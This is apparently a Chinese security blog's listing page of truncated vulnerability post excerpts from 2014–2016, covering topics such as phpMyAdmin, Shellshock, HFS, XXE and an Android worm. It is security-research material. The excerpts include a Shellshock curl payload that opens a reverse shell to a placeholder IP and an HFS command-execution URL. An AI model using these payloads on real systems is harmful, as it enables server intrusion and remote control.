漏洞

admin 9年前 (2016-01-03) 3387浏览 0评论

转自：http://blog.nsfocus.net/security-incident-response-system-design/ 层出不穷的安全事件使大家意识到，企业安全体系不是部署入侵检测，防火墙等安全设备就够了。企业安全团队在应对越来越复...

admin 10年前 (2015-08-16) 3483浏览 0评论

转自：http://blog.nsfocus.net/cc-attack-defense/ DDoS攻击凭借其严重的后果以及简单的操作，一直都是攻防中重要的攻击方式。随着DDoS攻击的演变，信息安全的防御也在同步升级。发展到今天，DDoS攻击已经多种...

admin 11年前 (2014-12-02) 2750浏览 0评论

作者：phithon 0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件，基于PHP开发。最新的CVE-2014-8959公告中，提到该程序多个版本存在任意文件包含漏洞，影响版本如下： phpMyAdmin 4.0...

admin 11年前 (2014-11-14) 2584浏览 0评论

微软本月安全更新修复了一个潜藏了18年的IE远程代码执行漏洞（CVE-2014-6332），可以说是给windows吃了一颗大补丸。缺陷出现在 VBScript的代码中，自Windows 95首次发布（19年前）以来就一直存在。袁哥的眼泪哗哗的。随便...

admin 11年前 (2014-10-07) 4963浏览 0评论

原文：http://sb.f4ck.org/thread-20348-1-1.html 1、google高级搜索intitle:ad.sangfor.com，这个问题几年前发现的，因为设计缺陷造成，现在搜到的结果比以前少很多了。 当然还有其他的手段，...

admin 11年前 (2014-09-29) 4296浏览 0评论

一、命令执行漏洞分析 利用这个漏洞，需要两个条件： 服务器收到请求后，会执行bash 执行bash的时候，会将UserAgent等设置成环境变量 同时满足这两点的，一般是使用CGI的服务器，所以受到影响的服务器份额(我语文不好)不是很大。 对它进...

admin 11年前 (2014-09-25) 5883浏览 0评论

ps:利用payload curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP...

admin 11年前 (2014-09-23) 3867浏览 0评论

转自：http://www.hackqing.com/index.asp?FoxNews=1268.html 这个程序在国内用的特别多，特别是那些抓肉鸡的黑阔。 http://localhost:80/?search=%00{.exec|cmd.} ...

admin 11年前 (2014-09-11) 4864浏览 0评论

本文隐藏内容 登陆 后才可以浏览 转载请注明：jinglingshu的博客 » 边信道攻击(side channel attack 简称SCA)...

admin 11年前 (2014-09-08) 2270浏览 0评论

0x00 相关背景介绍 Clickjacking（点击劫持）是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼在2008年首创的。 是一种视觉欺骗手段，在web端就是iframe嵌套一个透明不可见的页面，让用户在不知情的情况下，点击攻击者想要欺骗用户点...

admin 11年前 (2014-08-21) 2708浏览 0评论

“你走进一个咖啡店坐下来。等咖啡的时候，你拿出你的智能手机开始玩一款你前些天下载的游戏。接着，你继续工作并且在电梯里收邮件。在你不知情下，有攻击者获取了公司网络的地址并且不断地感染你所有同事的智能手机。 等下， 什么？ 我们在Bromium实验室博客...

admin 11年前 (2014-08-07) 3610浏览 2评论

DNS区域传送（DNS zone transfer）指的是一台备用服务器使用来自主服务器的数据刷新自己的域（zone）数据库。这为运行中的DNS服务提供了一定的冗余度，其目的是为 了防止主的域名服务器因意外故障变得不可用时影响到整个域名的解析。一般来...

admin 11年前 (2014-08-03) 2005浏览 0评论

0×00 今天从余弦大大微博上看到了这款Android短信蠕虫的信息，于是自己下载了一款研究，看到网上很多报告的md5值不同，不知道是否是变种。接下来就分析一下，这款病毒究竟做了些什么。 0×01 病毒分为两个部分，一个是XXshenqi.apk，另...

admin 11年前 (2014-08-01) 5310浏览 1评论

很多次听到人说apache的“解析漏洞”了，正好今天又有人问，那就简单科普一下这个“解析漏洞”是何物。先来看测试过程和结果的对比吧。结果一 首先，我安装了apache 2.x版本，同时以module方式使apache与php结合，测试发现确实存在这样...

admin 11年前 (2014-07-30) 4515浏览 2评论

影响系统 Wordpress MailPoet < 2.6.7 漏洞发布时间:2014-07-01 漏洞更新时间:2014-07-01 危害 远程攻击者可以利用漏洞可上传任意文件。 攻击所需条件 攻击者必须访问Wordpress MailPoe...

admin 11年前 (2014-07-10) 11667浏览 0评论

0x01 下午在群里看到的 问下朋友大概 然后用不生不熟的sqlmap在那跑 – 表能跑的出 列就GG了 然后没辙 – 晚上跑各大论坛逛了遍果然大神多 就慢慢的研究下了下 看了pt0n大牛的分析文 真心感叹这洞 呵呵-。- 0...

admin 11年前 (2014-07-10) 1884浏览 0评论

谷歌信息安全工程师米歇尔·斯帕格诺洛（Michele Spagnuolo）周二在博客称，Flash Player的升级补丁存在漏洞。 用户在访问eBay，Tumblr，Twitter或Instagram等网站后，其计算机可能被骇客控制，数百万用户的身...

admin 11年前 (2014-07-09) 13014浏览 1评论

0×00 前言 XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题. 在XML1.0标准⾥里,XML文档结构⾥里定义了实体(e...

admin 11年前 (2014-07-08) 4727浏览 2评论

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different...

admin 11年前 (2014-07-06) 2236浏览 0评论

本文隐藏内容 登陆 后才可以浏览 转载请注明：jinglingshu的博客 » 利用location来变形我们的XSS Payload...